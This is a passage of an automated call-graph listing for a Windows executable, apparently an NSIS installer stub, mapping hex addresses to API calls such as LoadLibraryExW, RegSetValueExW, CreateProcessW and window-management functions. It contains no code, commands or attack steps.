4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4110 403d3f 19 API calls 4107->4110 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4115 405608 SetClassLongW 4110->4115 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de DestroyWindow KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4162 40581e DestroyWindow 4142->4162 4172 403d3f 4142->4172 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4148 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 